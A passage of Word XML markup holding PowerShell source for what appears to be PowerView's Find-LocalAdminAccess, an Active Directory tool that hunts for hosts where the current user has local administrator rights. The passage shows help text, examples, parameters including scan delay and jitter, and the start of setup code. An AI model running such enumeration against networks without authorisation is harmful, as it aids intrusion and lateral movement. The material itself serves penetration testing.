    <w:p w14:paraId="2436EBAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host array to enumerate, passable on the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FBF25C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="018D9B34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3087BCF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6268DD24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        File of hostnames/IPs to search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF8A71F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D304E24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01329AEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D6DC2B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host filter name to query AD for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D30FA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A0BD7EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2366F930" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="40725D5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7471BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543BEE92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A3C3693" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER NoPing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13066F96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78F37A39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Don't ping each host to ensure it's up before enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4C768" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F82AD6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33444E32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E78A9F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Delay between enumerating hosts, defaults to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561CF505" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FF09291" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER Jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B337EAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="418F5697" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Jitter for the host delay, defaults to +/- 0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9AAFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2F214E01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBA48A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="248191F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain to query for machines, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C9C17F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C10D5EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB555C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B36A53B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D971D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="294ADC5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchForest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F50220" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D5F68C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Search all domains in the forest for target users instead of just</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604299DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a single domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7615A6BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37AAEA11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E2719B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="342D2293" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The maximum concurrent threads to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42941E05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47507DA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F08531" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2732A4BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-LocalAdminAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE6848E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="127827A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find machines on the local domain where the current user has local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269548D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        administrator access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48185BE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6989F000" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC9165A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C6B592F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-LocalAdminAccess -Threads 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D49157F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57CA9688" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Multi-threaded access hunting, replaces Find-LocalAdminAccessThreaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FDC0BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4ED7EAA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C50DF68" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5597661B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-LocalAdminAccess -Domain testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C350508" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="090EDAFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find machines on the 'testing' domain where the current user has</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F35ED9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        local administrator access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288A5CE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F1A30D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD00FFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B01D74A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-LocalAdminAccess -ComputerFile hosts.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD1A2F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BD250EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find which machines in the host list the current user has local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E772B06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        administrator access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBA755A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3834ADF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58021C37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64015B1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231198BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://www.harmj0y.net/blog/penetesting/finding-local-admin-with-the-veil-framework/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D7AC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB0DC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="684BCEF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F501E31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA321AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304FEEEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Alias('Hosts')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D9DFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F2CCFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE5309" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67B44D4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B062BF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostList')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D13D8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24334B7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE34775" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50393FED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F563A91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A11B3DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="442D909B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23115F0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C786045" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61121C25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE92A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NoPing,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DC0681" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04F23871" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [UInt32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6BF5A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Delay = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC071F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="636A08FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Double]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E73B0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Jitter = .3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D178EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79190B37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D02521" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2D4F68" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="514C429D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A46835" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3EBE07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="650CE749" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B11C611" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchForest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E85F41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="749B1BB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,100)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D83839C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395CFE2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F9342" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02112A70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6795CDE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7908C7C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($PSBoundParameters['Debug']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E4D1E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DebugPreference = 'Continue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45550573" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BEDCA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A23BE45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # random object for delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28474179" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RandNo = New-Object System.Random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A781B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4528439D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[*] Running Find-LocalAdminAccess with delay of $Delay"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6BAB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61261921" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we're using a host list, read the targets in and add them to the target list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F0399" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ComputerFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2859BAAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = Get-Content -Path $ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B8499" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FA9DD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="138582FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF0DF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [array]$ComputerName = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC6647C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5809E102" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09DC3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = @($Domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B525006" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4BD71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($SearchForest) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F74418F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get ALL the domains in the forest to search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A03FCEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A817C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
